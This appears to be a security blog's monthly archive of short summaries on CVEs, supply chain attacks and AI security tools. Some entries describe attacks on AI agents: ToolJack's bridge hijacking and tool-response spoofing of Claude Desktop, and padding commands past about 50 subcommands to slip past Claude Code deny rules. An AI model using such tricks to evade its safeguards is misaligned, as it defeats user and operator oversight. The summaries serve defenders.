Posts

Showing posts from April, 2026

1000th post at last

Image
  1000. Big... round... number.  I've submitted a talk for BSidesSP 2026 about it. Crossing finger here. I will keep you posted.

NIST Revamps NVD to Handle Exploding Vulnerability Volume

National Institute of Standards and Technology announced updates to the National Vulnerability Database to cope with rapid growth in Common Vulnerabilities and Exposures records. The changes focus on improving processing efficiency, prioritizing high-impact vulnerabilities, and scaling operations as submissions surge. NIST aims to reduce backlogs and deliver faster enrichment data, acknowledging that rising CVE volume has outpaced traditional workflows and requires more automation and refined prioritization. https://www.nist.gov/news-events/news/2026/04/nist-updates-nvd-operations-address-record-cve-growth

Protecting Cookies with Device Bound Session Credentials

Google has announced public availability of Device Bound Session Credentials (DBSC) for Windows users on Chrome 146, with macOS support coming soon. DBSC cryptographically binds authentication sessions to a specific device using hardware-backed security modules like the Trusted Platform Module (TPM) on Windows and the Secure Enclave on macOS. The browser generates a unique public/private key pair that cannot be exported from the machine. Servers issue short-lived session cookies contingent on Chrome proving possession of the corresponding private key, rendering any exfiltrated cookies useless to attackers who steal them via infostealer malware such as LummaC2. DBSC shifts from reactive detection to proactive prevention, and Google has observed a significant reduction in session theft since its early rollout. The protocol preserves privacy by using distinct keys per session, preventing cross-session or cross-site correlation. DBSC was designed as an open web standard through the W3C pro...

OpenSSL 4.0.0 Released: Deprecated Protocols Cut, Post-Quantum Support Added

OpenSSL 4.0.0 is a major release that removes long-deprecated features and introduces post-quantum cryptography support. SSLv3 support and SSLv2 Client Hello are gone entirely, as is the engine API for external cryptographic hardware. The release adds Encrypted Client Hello (ECH) per RFC 9849 to encrypt server name indications, plus the hybrid key exchange group curveSM2MLKEM768, the ML-DSA-MU digest algorithm, cSHAKE per NIST SP 800-185, and negotiated FFDHE key exchange for TLS 1.2. API changes include making ASN1_STRING opaque, deprecating several X.509 time comparison functions, and removing BIO_f_reliable. Build changes drop support for deprecated elliptic curves and darwin-i386/darwin-ppc targets, remove the c_rehash script in favor of openssl rehash, and add Visual C++ runtime linkage options on Windows. Applications built against older OpenSSL versions will require code updates due to the API and behavior changes. https://www.helpnetsecurity.com/2026/04/14/openssl-4-0-0-release...

Google Signals Earlier Risk of Quantum Attacks on Bitcoin

Google researchers indicate that advances in quantum algorithms could allow future quantum computers to break Bitcoin’s cryptographic protections sooner than expected, requiring far fewer qubits than previously estimated. This could make certain Bitcoin wallets vulnerable once sufficiently powerful machines exist, potentially within the next decade. Although current technology is not yet capable, the findings highlight the urgency of preparing post-quantum security measures, especially given the difficulty of upgrading decentralized systems like Bitcoin in time.  https://www.forbes.com/sites/digital-assets/2026/03/31/google-finds-quantum-computers-could-break-bitcoin-sooner-than-expected/

ToolJack: Hijacking AI Agent Perception via Bridge Exploitation

ToolJack is an attack methodology that manipulates the trust boundary between AI agents and their tools. After achieving local compromise, an attacker can extract session credentials, pivot across devices, and intercept the bridge protocol between Claude Desktop and its browser extension. This enables Phantom Tab Injection (fabricating tabs only the agent sees) and Tool Relay Spoofing (replacing legitimate tool responses with attacker-controlled data), leading to Remote Listener Indirect Prompt Injection—actively constructing a poisoned environment around the agent. Testing showed complete control over the agent's perceived context, but Anthropic's model-level safety alignment consistently blocked autonomous code execution. The research concludes that infrastructure requires cryptographic tool attestation and device-bound tokens, while model alignment serves as a critical last line of defense.  https://www.preamble.com/blogs/tooljack-hijacking-an-ai-agents-perception-through-br...

Axios Compromised on npm: Malicious Versions Drop Remote Access Trojan

On March 30, 2026, a threat actor compromised the npm account of a lead axios maintainer and published two malicious versions—axios@1.14.1 and axios@0.30.4—injecting a hidden dependency called plain-crypto-js@4.2.1. This dependency never appears in axios source code and exists solely to execute a postinstall script that drops a cross-platform remote access trojan (RAT) targeting macOS, Windows, and Linux. The attacker pre-staged the malicious package 18 hours earlier with a decoy version to evade detection, then published both axios releases within 39 minutes. The RAT dropper contacts a command-and-control server at sfrclak.com:8000, delivers platform-specific second-stage payloads, then self-deletes and replaces its own package.json with a clean stub to hide forensic evidence. The malicious versions were live for approximately three hours before npm unpublishing. Detection came from StepSecurity’s AI Package Analyst and Harden-Runner, which flagged anomalous outbound connections in CI...

OWASP PTK Findings as ZAP Alerts

The OWASP PTK add-on version 0.3.0 for ZAP (Zed Attack Proxy) now surfaces findings from the OWASP PenTest Kit browser extension as native ZAP alerts, bridging the gap between proxy-level scanning and client-side security testing. PTK runs inside the browser to detect issues that ZAP cannot reliably see from the proxy layer alone, including UI-driven flows in single-page applications, DOM updates, JavaScript sinks in bundled code, and runtime behavior. The add-on supports three engine types: SAST for analyzing loaded JavaScript scripts, IAST for capturing runtime signals during user flows, and DAST for browser-driven request mutation. Users can select which rule packs to run, optionally enable automated scanning when the browser launches, and review all findings in ZAP's standard Alerts tab with severity filtering, false positive marking, and reporting. The integration adds 142 OWASP PTK-tagged alert types to ZAP, with a Juice Shop walkthrough demonstrating the workflow of launchin...

Inkog: AI Agent Security Platform

Inkog is a security platform designed to find vulnerabilities in AI agent logic before production deployment. It scans agents for prompt injection, tool misuse, infinite loops, missing oversight, and other risks, mapping findings to compliance frameworks and providing severity-ranked results with remediation guidance. The platform supports 20+ frameworks, completes scans in under 60 seconds, requires no code changes, and includes a CLI and MCP server that are open source under Apache 2.0. Based on a scan of 500+ open-source AI agents that found 85% had at least one vulnerability, Inkog offers a free tier of up to five scans per month. The MCP server integration allows developers using Claude, Cursor, and Claude Code to scan, explain, and fix agent security issues directly within their AI assistant conversation without leaving the chat interface.  https://inkog.io/

CycloneDX Assessors Studio

CycloneDX Assessors Studio is an open source platform that transforms compliance checklists into verifiable, machine-readable attestations. Built on the CycloneDX attestation model, it enables organizations to map controls to standards (NIST SSDF, PCI DSS, Cyber Resilience Act), collect evidence, author structured claims, and generate signed attestations that both machines and humans can trust. The platform provides a dashboard for compliance oversight, an interactive entity relationship graph for mapping organizational structures, and guided assessment workflows with full traceability from requirements through evidence to attestation. Core capabilities include evidence management with provenance tracking, electronic and digital signatures, an integrated standards library, and an API-first architecture that supports embedding attestation generation directly into CI/CD pipelines. Use cases span regulatory compliance, supply chain assurance, secure development lifecycle verification, and...

AI Literacy Is a Liability Dressed Up as a Skill

This critical essay argues that the growing demand for "AI-literate" workers—people who know how to phrase prompts and trust AI outputs without understanding underlying mechanisms—is creating a security and privacy disaster in waiting. The author contends that leaders pressured for efficiency are lowering the bar, flooding the workforce with individuals who lack understanding of indirect prompt injection, system prompt safeguards, and governance frameworks like NIST and the EU AI Act. Using examples including an AI email assistant compromised by malicious instructions and a medical receptionist overseeing an AI triage agent that mishandles sensitive data, the piece demonstrates how ambiguous objectives and missing security layers lead to classified documents being uploaded to wrong systems, personal data exposed to unauthorized AI, and agents given improper access. The essay concludes that AI incident response will be a growth field for decades, and that workplaces need genui...

ASTRA: API Security Threat & Risk Atlas

ASTRA is a structured, community-driven threat matrix for API security, modeled after MITRE ATT&CK but built specifically for APIs. It provides a protocol-native knowledge base covering REST, GraphQL, gRPC, WebSocket, and SOAP across five tactic categories: Reconnaissance, Authentication Abuse, Authorization Failure, Exfiltration, and Impact. Version 1.0 includes 14 techniques such as BOLA, BFLA, JWT none algorithm bypass, GraphQL introspection leaks, excessive data exposure, and API DoS. Each technique includes a description, attack scenario, protocol applicability, composite severity score, a ready-to-use Sigma detection rule, a real-world breach mapping (e.g., Twitter 2022, Optus 2022, Peloton 2021), and remediation guidance. The project is open source under CC BY 4.0, accepts community contributions, and is designed for threat modeling, penetration testing, and SIEM integration.  https://github.com/isha-singhMalik/Astra

Audio Steganography in Supply Chain Attacks

This tutorial explains how attackers hide malware inside WAV audio files using steganography, based on the real-world TeamPCP supply chain campaign from March 2026 that compromised popular PyPI and npm packages including Trivy, litellm, and the Telnyx SDK. The technique uses payload packing—embedding base64-encoded, XOR-encrypted payloads within valid WAV file frames while maintaining legitimate audio headers—to evade network inspection tools, EDR software, and MIME-type checks. The tutorial breaks down the five-step attack chain, provides hands-on encoder/decoder code examples, and covers detection strategies including entropy analysis, frame data validation, network traffic monitoring, and package integrity verification. Defenses include pinning dependencies with hash verification, using SCA tools, monitoring for unexpected network activity, implementing egress filtering, and verifying package provenance against source repositories.  https://pwn.guide/free/cryptography/audio-steg...

OpenSSF Secure Coding Guide for Python

The OpenSSF Secure Coding One Stop Shop for Python is an academic-style resource designed to teach secure coding practices for CPython 3.9 and above, targeting new Python programmers and security researchers. The guide provides working code examples organized into nine categories including numbers, neutralization (preventing injection attacks), exception handling, logging, concurrency, coding standards, and cryptography. Each entry follows a standardized format with noncompliant and compliant code examples, maps to CWE identifiers, and links to prominent CVEs with CVSS and EPSS scores where available. The guide specifically avoids covering external Python modules beyond the standard library and emphasizes that code examples are for educational use only, not production deployment. Topics covered include SQL injection prevention, secure deserialization, safe archive extraction, avoiding format string and OS command injection, proper exception propagation, excluding sensitive data from lo...

AuthSnitch: AI-Powered Pull Request Monitor for Authentication Security

AuthSnitch is a GitHub Action that monitors pull requests for authentication-related changes and alerts security teams. It uses two independent detection signals: Claude AI intelligently analyzes code changes for authentication modifications, while configurable keyword matching detects terms like JWT, OAuth, SAML, SSO, MFA, and identity providers (Okta, Auth0, Azure AD). Notifications are sent via PR comments, Slack, or Microsoft Teams based on boolean logic—by default only when both signals agree, with options to widen the net. The action is advisory only, never blocking merges, and supports custom keywords, detection prompts, and editable notification templates. Built-in framework detection includes Devise, Passport, Django-allauth, and others across Ruby, JavaScript, and Python.  https://github.com/jaybobo/authsnitch

Vulnetix Code Scanner

Vulnetix Code Scanner is a unified CLI tool that replaces eleven separate security tools with a single command. It performs SCA, SAST, secrets detection, IaC scanning, container scanning, license compliance, SBOM generation, VEX attestations, and code quality linting across 35+ ecosystems. Key features include malware detection from four intelligence sources, supply chain defenses (block malware, enforce pinning, version lag, cooldown periods), automated CycloneDX SBOMs and VEX statements, and native AI coding agent integration with incremental scanning. The tool provides unified severity scoring, correlates related findings, supports granular CI/CD gates, runs locally or in any pipeline, and requires no configuration—auto-discovering all manifest files.  https://www.vulnetix.com/features/code-scanner

ScopeGuardian: Automated Security Scanning CLI for CI/CD Pipelines

ScopeGuardian is an open-source command-line tool that orchestrates multiple security scanners on a codebase and synchronizes findings with DefectDojo. It runs KICS for infrastructure-as-code scanning, Grype with Syft for software composition analysis, and OpenGrep for static application security testing—all in parallel. The tool automatically manages DefectDojo engagements per project and branch, with protected branches receiving one-year engagements and feature branches getting one-week windows. It includes a built-in security gate that can block CI/CD pipelines when vulnerability counts exceed configurable thresholds per severity level, evaluating either raw local scan results or deduplicated findings from DefectDojo when both synchronization and threshold options are used together. ScopeGuardian ships as a Docker image with all scanners pre-installed, supports granular threshold rules like failing on one critical or five high findings, and offers community, professional, and enterp...

One Hacker, Two AIs, and a Nation-Scale Breach

The report details a real-world cyberattack where a single operator used Claude Code and GPT-4.1 to compromise nine Mexican government agencies and steal massive volumes of sensitive data. AI was not just an assistive tool—it became the operational backbone, generating most commands, automating reconnaissance, producing exploit code, and turning raw data into structured intelligence at scale. Over 1,000 prompts led to thousands of executed actions and hundreds of custom scripts, compressing attack timelines from days to hours. The key insight is that AI collapses the skill, time, and resource barriers for advanced attacks, enabling one individual to perform at the level of a coordinated team. https://gambit.security/blog-post/a-single-operator-two-ai-platforms-nine-government-agencies-the-full-technical-report

Project Glasswing: Using Frontier AI to Secure the World’s Most Critical Software

The article introduces Project Glasswing, a coordinated initiative led by Anthropic alongside major tech and security organizations to defend critical software using a powerful unreleased model, Claude Mythos Preview. The model has demonstrated the ability to find and exploit vulnerabilities at a level surpassing most human experts, uncovering thousands of serious flaws across major systems. Because these capabilities could also enable large-scale attacks, access is restricted to trusted partners who use it defensively. The core idea is to get ahead of inevitable AI-driven threats by applying these capabilities first to patch and secure global infrastructure.  https://www.anthropic.com/glasswing

The AI Security Market Is Fragmented, Crowded, and Racing to Catch Up

The article maps the RSA 2026 cybersecurity startup landscape, showing a market flooded with vendors—mostly focused on AI—but lacking cohesive solutions. Startups cluster into narrow categories like AI posture management, agent security, identity, and supply chain, creating heavy overlap and confusion rather than clear differentiation. The core issue is architectural: tools solve isolated problems while risk spans across agents, data, and workflows. This fragmentation reflects a broader gap where governance, visibility, and control haven’t caught up with AI-driven complexity, leaving buyers navigating hype, redundancy, and incomplete security coverage.  https://jakee.vc/rsa-2026-landscape.html

A Public Index Mapping the Hidden Risks of AI Agent Skills

The page presents a searchable index of AI agent “skills” (tools, plugins, functions) analyzed through a security lens, aiming to make this emerging attack surface visible. Each skill is broken down with structured assessments that evaluate how its capabilities—like data access, automation, or external interactions—could be abused. The core idea is that skills define what agents can actually do, and therefore where risk lives. By cataloging vulnerabilities such as prompt injection, privilege escalation, and data leakage, the index helps security teams reason about agent behavior rather than just code.  https://index.tego.security/skills/

AEA/P: A Governance Layer for Autonomous AI Agents

The site introduces AEA/P (Autonomous Economic Agent Protocol), a framework designed to make AI agents accountable as economic actors. Instead of focusing on communication or payments, it adds a governance layer with verifiable identity, proof of performance, liability escrow, dispute resolution, and multi-party governance. The protocol treats agents as entities that can transact, build reputation, and be held financially liable. Its core idea is aligning incentives—rewarding reliable behavior and penalizing failures—so autonomous agents can safely participate in real-world economic systems.  https://aeap.ai/

ClawHub Exposes the Fragility of AI Agent Supply Chains

The article analyzes security risks uncovered in the ClawHub AI agent marketplace, showing that a significant portion of agent “skills” are either vulnerable or outright malicious. Because these skills can execute code, access APIs, and act autonomously, they create a high-risk supply chain similar to—but more dangerous than—npm. The research highlights widespread issues like excessive permissions, hidden malicious behavior, and lack of sandboxing. The key insight is that traditional scanning fails to detect these threats, requiring behavioral analysis and continuous monitoring to secure agent ecosystems.  https://trent.ai/blog/clawhub-ai-agent-security-analysis/

ZAP MCP Server Turns Security Scanning into a Conversational AI Workflow

The article introduces the ZAP MCP Server, an experimental integration that lets AI assistants interact directly with OWASP ZAP using the Model Context Protocol (MCP). Through chat, tools like ChatGPT or Claude can trigger scans, explore applications, and interpret security alerts, effectively acting as an intelligent interface for DAST workflows. The server exposes structured tools, data resources, and reusable scan prompts, enabling automation of complex tasks like spidering and active scanning. While powerful, it’s an early-stage feature with limited scope and notable security considerations around access control and exposure.  https://www.zaproxy.org/blog/2026-04-02-zap-mcp-server/

ACSM: A New Security Model Built for AI Coding Agents

The article introduces Agentic Coding Security Management (ACSM), a new category proposed by Corridor to address the security challenges of AI-driven software development. As AI tools generate code faster than it can be reviewed, traditional “find-and-fix” security models break down. ACSM shifts the focus to prevention by embedding security directly into the coding process—injecting context, enforcing guardrails, and monitoring AI agent behavior in real time. The goal is to eliminate vulnerabilities at creation, provide visibility into AI usage, and align security with the speed and autonomy of modern AI-assisted development. https://www.corridor.dev/blog/introducing-acsm

The Exploit Window Has Collapsed to Zero

The article presents a stark thesis: the time between vulnerability disclosure and exploitation has collapsed from years to effectively zero, driven largely by AI. Using “time-to-exploit” (TTE) data, it shows a shift from 771 days in 2018 to hours in 2024 and zero-day exploitation in 2025, where attacks often occur before disclosure. The root causes are structural—bad economic incentives, flawed disclosure models, and inherent asymmetry between attackers and defenders. AI amplifies this imbalance by making exploit generation instant, cheap, and scalable, rendering traditional patch-and-defend strategies obsolete and forcing a fundamental rethink of cybersecurity. https://zerodayclock.com/collapse

Vulnerability Explosion Is Outpacing Our Ability to Defend

The article argues that vulnerability exploitation is rapidly increasing and becoming a primary attack vector, while defenders are falling further behind. Despite massive growth in disclosed vulnerabilities—driven by software expansion and AI-assisted development—only a small fraction are ever exploited, yet organizations waste resources trying to fix everything. This creates overwhelming backlogs and inefficiency. Attackers, meanwhile, focus on the few high-impact, often already-known vulnerabilities. The core problem is a mismatch in “velocity”: vulnerabilities are growing faster than organizations can prioritize and remediate, demanding a shift toward context-driven, risk-based approaches.  https://www.resilientcyber.io/p/vulnerability-velocity-and-exploitation

Moak AI: A Full-Stack Platform for Running and Customizing Open Models

The site presents Moak AI as an end-to-end platform for building with generative AI, focused on running, fine-tuning, and deploying open-source models on managed GPU infrastructure. It offers serverless inference, dedicated endpoints, and customization workflows, allowing developers to quickly experiment and productionize models without managing hardware. The platform supports multiple model types and frameworks, emphasizes compatibility with OpenAI-style APIs, and targets both individual developers and enterprises. The core value is simplifying the entire AI lifecycle—from experimentation to deployment—while maintaining flexibility and scalability.  https://moak.ai/

Vibe Coding Trades Understanding for Speed—and Security Pays the Price

The article examines the rise of “vibe coding,” where developers rely on AI to generate code via natural language, prioritizing speed and accessibility over deep understanding. While this democratizes software creation and boosts productivity, it introduces significant risks: weak code comprehension, skipped design and security practices, and expanding attack surfaces. The trend may accelerate technical debt and overwhelm AppSec teams already struggling to keep up. The core tension is clear—AI enables faster development, but without strong guardrails, it shifts complexity and risk downstream into security and maintenance.  https://www.resilientcyber.io/p/vibe-coding-conundrums

AWS Makes S3 Buckets Safer by Disabling Customer-Managed Encryption by Default

The announcement introduces a new default security setting for Amazon S3 that disables server-side encryption with customer-provided keys (SSE-C) on all new buckets starting in April 2026. Existing buckets without SSE-C usage will also have it disabled automatically. This change pushes users toward AWS-managed encryption options like SSE-S3 or SSE-KMS, which are easier to audit and integrate. While SSE-C can still be enabled manually, the shift reduces risk from mismanaged keys and aligns S3 defaults with more secure, standardized encryption practices. https://aws.amazon.com/about-aws/whats-new/2026/04/s3-default-bucket-security-setting

OSV.dev: Google’s Unified Database for Open Source Vulnerabilities

The repository describes OSV.dev, a Google-backed open source vulnerability database and triage platform that aggregates security advisories from multiple ecosystems into a unified, machine-readable format. It standardizes how vulnerabilities map to specific packages and versions, enabling precise and automated detection. Through its API, web UI, and tools like OSV-Scanner, developers can scan dependencies, SBOMs, and containers for known issues. The core value is reducing ambiguity in vulnerability data and making security analysis more accurate, scalable, and automation-friendly across the entire open source ecosystem. https://github.com/google/osv.dev

GitHub’s 2026 Actions Roadmap Focuses on Locking Down the Supply Chain

The article outlines GitHub’s 2026 security roadmap for Actions, centered on strengthening software supply chain integrity and reducing trust in third-party components. Key initiatives include enforcing stricter policies like SHA pinning for actions, introducing immutable releases to prevent tampering, and adding artifact attestations for verifiable builds. GitHub is also expanding governance controls and making security features more accessible across plans. The overall direction is toward making workflows reproducible, verifiable, and resistant to dependency-based attacks, shifting from flexible automation toward tightly controlled, policy-driven execution.  https://github.blog/news-insights/product-news/whats-coming-to-our-github-actions-2026-security-roadmap

One Actor, Six Identities: How AI Scaled a GitHub Supply Chain Attack

The article details a large-scale supply chain campaign tracked by Wiz in which a single attacker operated six accounts to automate attacks against GitHub repositories. The campaign exploited the pull_request_target workflow to access secrets, using a fully automated pipeline—scan, fork, inject, and submit malicious pull requests. Over 500 attempts were launched, with a low success rate but still resulting in real credential theft. The attacker evolved tactics across waves, eventually using AI-generated, repo-aware payloads. The key takeaway is that AI dramatically lowers the cost and increases the scale of supply chain attacks, even when most attempts fail.  https://www.wiz.io/blog/six-accounts-one-actor-inside-the-prt-scan-supply-chain-campaign

Claude Code Deny Rules Can Be Silently Bypassed

The article explains a critical vulnerability discovered by Adversa in Anthropic’s Claude Code, where built-in “deny rules” meant to block dangerous commands can be bypassed under specific conditions. Due to a hard limit of around 50 subcommands, the system stops enforcing security checks on longer command chains and falls back to a permissive approval flow. Attackers can exploit this by padding commands with harmless steps and hiding malicious actions at the end, enabling data exfiltration or command execution. The issue highlights how agent design tradeoffs—like performance and token limits—can quietly disable core security controls. https://adversa.ai/blog/claude-code-security-bypass-deny-rules-disabled

AI Tools Are Quietly Breaking Zero Trust

The article argues that modern AI tools—especially LLMs and agents—are undermining the core assumptions of Zero Trust without organizations realizing it. While Zero Trust relies on strict identity, access control, and verification, AI systems blur boundaries by acting autonomously, chaining actions, and accessing multiple systems dynamically. This creates hidden trust paths, over-permissioned agents, and new attack surfaces like prompt injection and data leakage. The result is a false sense of security: companies think they’re enforcing Zero Trust, but AI introduces behavior and execution risks that traditional controls don’t monitor or constrain.  https://kanenarraway.com/posts/ai-tools-eroding-your-zero-trust-foundations

Using LLMs as Assistants, Not Replacements, in Secure Code Reviews

The post explains how tools like Claude Code can significantly accelerate secure code reviews by helping analysts understand unfamiliar codebases, map logic flows, and highlight potential security hotspots. However, it emphasizes that LLMs should be used as a support tool—not relied on to automatically find vulnerabilities—since naive use leads to many false positives. A structured approach with tailored prompts produces more useful insights, while keeping human validation central. It also highlights operational concerns like protecting sensitive code by running models in controlled environments. https://specterops.io/blog/2026/03/26/leveling-up-secure-code-reviews-with-claude-code

Automated API Authorization Testing for Modern Security Assessments

Hadrian is an open-source offensive security tool focused on detecting authorization vulnerabilities in APIs, such as broken object and function-level access controls. It uses role-based testing and customizable templates to systematically explore how different users can interact with REST, GraphQL, and gRPC endpoints. Designed for pentesters and security teams, it automates what is typically a manual process, integrates into broader testing workflows, and helps validate real exploitability rather than just flagging potential issues. https://github.com/praetorian-inc/hadrian

Practical Guide to Securing npm Dependencies and Supply Chains

This repository is a curated guide of security best practices for working with npm, focused on reducing risks from supply chain attacks and vulnerable dependencies. It covers techniques like disabling risky install scripts, enforcing deterministic installs, auditing packages before use, delaying adoption of new releases, and avoiding blind upgrades. It also includes guidance for developers and maintainers, such as using 2FA, minimizing dependencies, and adopting secure publishing methods, aiming to make JavaScript development more resilient to increasingly common package ecosystem attacks.  https://github.com/lirantal/npm-security-best-practices

AI-Powered Tool to Detect Sensitive Data in Public URLs

The Salesforce URL Content Auditor is an open-source security tool that scans publicly accessible URLs to identify exposed sensitive information. It downloads and analyzes content such as images, PDFs, and videos using AI to detect potential data leaks, privacy risks, and compliance violations. Designed for proactive security, it helps organizations audit external-facing content, support incident response, and integrate continuous monitoring into workflows to prevent unintended data exposure.  https://github.com/salesforce/url-content-auditor

Scaling Vulnerability Management with AI: What Actually Works

The article describes how Synthesia built an AI-driven vulnerability management system to handle overwhelming volumes of security findings from SAST and SCA tools. The key approach is aggressive automation: filtering noise (stale code, low-risk issues, false positives) so only meaningful findings become tickets. AI agents then validate vulnerabilities using consensus-based analysis and automatically generate fixes as pull requests, shifting developers from writing fixes to reviewing them. This system drastically reduced backlog and manual effort—only a small fraction of issues require human review—allowing security teams to focus on high-impact risks while accelerating remediation https://www.synthesia.io/post/scaling-vulnerability-management-with-ai-what-actually-worked

VulnVibes: AI Agent for Context-Aware Vulnerability Triage

The article introduces VulnVibes, an experimental AI security agent designed to analyze GitHub pull requests with full architectural context rather than isolated code scanning. Unlike traditional SAST tools, it reasons across multiple repositories, infrastructure configs, and service interactions to determine whether a vulnerability is actually exploitable. It works in two stages: fast threat modeling to filter relevant changes, followed by deep investigation that traces attack paths across services, configs, and environments. The system produces structured verdicts with reasoning, confidence, and risk levels. The key insight is that real security issues often emerge from system-level interactions, not single files, and effective AI tooling must replicate how human engineers analyze entire systems, not just code snippets. https://www.anshuman.ai/posts/vulnvibes-intro

Why Mutational Grammar Fuzzing Can Mislead Bug Discovery

The article explains mutational grammar fuzzing, a technique that generates structured test inputs by mutating data while preserving grammar rules, making it effective for testing complex parsers and languages.  However, it argues the approach has important flaws. Coverage-guided fuzzing can prioritize inputs that increase code coverage without actually finding more bugs, leading to misleading results. Grammar constraints can also limit exploration, preventing the fuzzer from reaching unexpected or invalid states where vulnerabilities often exist. The author proposes simple mitigation strategies, emphasizing that fuzzing effectiveness depends less on structure-awareness alone and more on balancing coverage, mutation diversity, and exploration beyond strict grammar boundaries.  https://projectzero.google/2026/03/mutational-grammar-fuzzing.html

GitHub Actions 2026: Secure-by-Default CI/CD

The roadmap outlines GitHub’s plan to strengthen GitHub Actions security by focusing on three main areas: secure defaults, stronger policy controls, and improved CI/CD observability. It aims to reduce common attack paths such as untrusted code execution, over-permissioned credentials, and lack of visibility in workflows.  Key initiatives include enforcing safer configurations by default, enabling organizations to define and enforce security policies across workflows, and increasing transparency into pipeline behavior to detect malicious activity. The broader goal is to harden the entire software supply chain, especially as attackers increasingly target CI/CD systems themselves. https://github.blog/news-insights/product-news/whats-coming-to-our-github-actions-2026-security-roadmap

End-to-End Approach to Securing the Open Source Supply Chain

The article outlines how GitHub is building a comprehensive, end-to-end approach to securing the open source supply chain across the entire development lifecycle. It emphasizes visibility into dependencies (via dependency graphs and SBOM-like capabilities), automated vulnerability detection and remediation (e.g., Dependabot), and stronger integrity guarantees through features like artifact attestations and signed builds.  A key theme is integrating security directly into developer workflows (“shift left”) so issues are detected early without slowing delivery. The approach also focuses on provenance, ensuring code and artifacts can be trusted, and on ecosystem-wide collaboration to reduce systemic risk in open source. Overall, GitHub promotes a layered strategy combining automation, verification, and developer-first tooling to address modern supply chain attacks. https://github.blog/security/supply-chain-security/securing-the-open-source-supply-chain-across-github/

The False Security of SHA Pinning in GitHub Actions

The article argues that pinning dependencies to commit SHAs in GitHub Actions—commonly considered a best practice—creates a false sense of security. While SHAs are immutable, GitHub does not verify that a referenced SHA actually belongs to the intended repository. This allows attackers to substitute malicious code from a fork while keeping the same repo name, making changes hard to detect in reviews. The core issue is lack of provenance, not immutability, showing that SHA pinning alone is insufficient without validation and stronger supply chain controls  https://www.vaines.org/posts/2026-03-24-the-comforting-lie-of-sha-pinning

TeamPCP Campaign: Weaponizing the Software Supply Chain

The TeamPCP campaign describes a highly coordinated March 2026 supply chain attack that began with a single compromised credential and rapidly spread across multiple developer ecosystems. Attackers injected credential-stealing malware into widely trusted tools like Trivy, KICS, LiteLLM, and other packages used in CI/CD pipelines. The malware harvested cloud tokens, SSH keys, and secrets directly from automated workflows, then reused stolen credentials to expand the attack across GitHub, PyPI, npm, and container environments. The campaign stands out for its speed, automation, and focus on security tools themselves, turning defensive infrastructure into an attack vector. It demonstrates how trust relationships in modern software pipelines can enable cascading, large-scale compromises, highlighting the need for stricter credential management, dependency controls, and CI/CD hardening. https://opensourcemalware.com/blog/teampcp-supply-chain-campaign

AI-Powered Framework for Scalable Vulnerability Scanning

The article explains how GitHub Security Lab’s open source AI-powered framework uses an agent-based system (Taskflow Agent) to automate vulnerability discovery in codebases. It combines LLM reasoning with structured “taskflows” (step-by-step workflows) to systematically audit software for issues like auth bypasses, IDORs, and token leaks. The framework integrates with tools like CodeQL and external services to handle deterministic tasks, while reserving AI for deeper analysis. It has proven effective at finding high-impact bugs in open source projects, demonstrating a scalable, collaborative approach to modern security research.  https://github.blog/security/how-to-scan-for-vulnerabilities-with-github-security-labs-open-source-ai-powered-framework

Open Source Security Trends: Rising Malware and Faster Exploits

The report analyzes a year of open-source security data across CVEs, advisories, and malware, highlighting a shift toward more malicious packages and faster exploitation cycles. Malware in package ecosystems remains a major and growing threat, with thousands of malicious advisories published annually. Attackers increasingly target trusted distribution channels and developer workflows. At the same time, vulnerability disclosure is accelerating, with exploits often appearing shortly after advisories. The findings emphasize that modern supply chain security must go beyond CVEs, incorporating malware detection, faster response, and continuous dependency monitoring.  https://github.blog/security/supply-chain-security/a-year-of-open-source-vulnerability-trends-cves-advisories-and-malware

AI Security Radar: Detecting Vulnerabilities Introduced by AI-Generated Code

The Vibe Security Radar project is a research tool that identifies security vulnerabilities associated with AI-generated code. It analyzes vulnerability databases such as CVE and NVD, traces fixes through commit history, and looks for signs that code was produced with AI assistance. It then uses a language model to assess whether the vulnerability likely originated from AI-generated code. The findings show that AI-assisted development can introduce critical security risks, emphasizing the need for better detection and mitigation practices. https://github.com/HQ1995/vibe-security-radar